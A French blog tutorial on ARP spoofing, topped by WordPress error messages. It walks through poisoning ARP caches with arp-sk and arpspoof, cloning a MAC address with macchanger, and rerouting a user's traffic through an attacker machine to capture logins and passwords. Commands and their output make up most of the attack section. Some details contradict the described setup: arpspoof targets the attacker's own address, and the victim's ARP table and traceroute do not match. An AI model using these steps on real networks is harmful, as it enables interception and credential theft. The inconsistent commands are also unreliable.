Warning: Parameter 1 to wp_default_scripts() expected to be a reference, value given in /customers/5/4/c/nesquiikz.com/httpd.www/wp-includes/plugin.php on line 600 Warning: Parameter 1 to wp_default_styles() expected to be a reference, value given in /customers/5/4/c/nesquiikz.com/httpd.www/wp-includes/plugin.php on line 600 ARP Spoofing | Hacker Informatique Warning: Cannot assign an empty string to a string offset in /customers/5/4/c/nesquiikz.com/httpd.www/wp-includes/class.wp-scripts.php on line 447

ARP Spoofing

I – Méthode avec l’utilitaire « arp-sk »

 

Sur un réseau, lorsqu’un hôte cherche à en joindre un autre, il faudra mettre en relation l’adresse IP et l’adresse physique de l’interface sur laquelle est configurée l’adresse IP. Le protocole ARP permet d’établir cette correspondance. Si un attaquant exploite ce protocole, il lui sera possible d’usurper l’adresse mac du destinataire et\ou de l’expéditeur. Un logiciel comme « Arp-sk » permet d’emprunter les adresses physiques des interfaces spécifiées.

 

Considérons Trois ordinateurs :

192.168.0.1 (IP du routeur)

192.168.0.20 (IP de l’utilisateur)

192.168.0.30 (IP du pirate)

 

Avant l’attaque sur 192.168.0.1 :

$ arp -na

[…]

(192.168.0.20) à 00:21:85:49:23:6d [ether]

 

Depuis l’ordinateur pirate (192.168.0.30), je tente de modifier l’adresse mac de 192.168.0.20 dans le cache ARP de 192.168.0.1 :

# arp-sk -w -d 192.168.0.1 -S 192.168.0.20 -D 192.168.0.1

Initialization of the packet structure

+ Running mode « who-has »

+ Ifname: eth0

+ Source MAC: 00:26:9e:29:02:5b

+ Source ARP MAC: 00:26:9e:29:02:5b

+ Source ARP IP : 192.168.0.20

+ Target MAC: 00:18:f3:fb:2c:1c

+ Target ARP MAC: 00:00:00:00:00:00

+ Target ARP IP : 192.168.0.1

 

 

Après l’attaque sur 192.168.0.1:

$ arp -na

[…]

(192.168.0.20) à 00:26:9e:29:02:5b [ether]

 

L’adresse mac est bien modifiée. Il devient donc facile pour le pirate (192.168.0.30) de changer l’adresse MAC de son PC pour mettre celle anciennement utilisé par 192.168.0.20 (l’utilisateur) pour usurper son identité à l’aide de la commande :

macchanger –mac 00:21:85:49:23:6d eth1

 

Donc l’attaque par ARP-Cache Poisionning avec Arp-sk a fonctionnée.

 

II – Autre méthode :

 

Considérons Trois ordinateurs :

A. Le serveur, 00:00:00:00:00:01 – 192.168.0.10

B. Un utilisateur, 00:00:00:00:00:02 – 192.168.0.20

C. Le pirate, 00:00:00:00:00:03 – 192.168.0.30

 

C annonce à B “192.168.0.10” est a l’adresse MAC: 00:00:00:00:00:03.

C annonce à A “192.168.0.20” est a l’adresse MAC: 00:00:00:00:00:03.

 

Voici les commandes faites par le pirate :

[user@cible]$ traceroute 192.168.0.10

traceroute to 192.168.0.10 (192.168.0.10), 30 hops max, 40 byte packets

1 192.168.0.10 (192.168.0.10) 718 ms 461 ms 849 ms

 

 

[user@cible]$ arp

Address HWtype HWAddress Flags Mask Iface

192.168.0.10 ether 00:00:00:00:00:01 C eth0

192.168.0.30 ether 00:00:00:00:00:03 C eth0

 

 

[evil@pirate]$ arpspoof -t 192.168.0.30 192.168.0.10

0:0:0:0:0:3 0:0:0:0:0:2 0806 42: arp reply 192.168.0.10 is-at 0:0:0:0:0:3

0:0:0:0:0:3 0:0:0:0:0:2 0806 42: arp reply 192.168.0.10 is-at 0:0:0:0:0:3

0:0:0:0:0:3 0:0:0:0:0:2 0806 42: arp reply 192.168.0.10 is-at 0:0:0:0:0:3

 

 

[user@cible]$ traceroute 192.168.0.10

traceroute to 192.168.0.10 (192.168.0.10), 30 hops max, 40 byte packets

1 192.168.0.10 (192.168.0.10) 612 ms 465 ms 515 ms

2 192.168.0.30 (192.168.0.30) 238 ms 121 ms 169 ms

 

Maintenant toutes les communications de l’utilisateur vers le serveur (ou inversement) seront routées vers le pirate… qui pourra par exemple récupérer les login/mot de passe.

 

 

 

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *


*

Translate »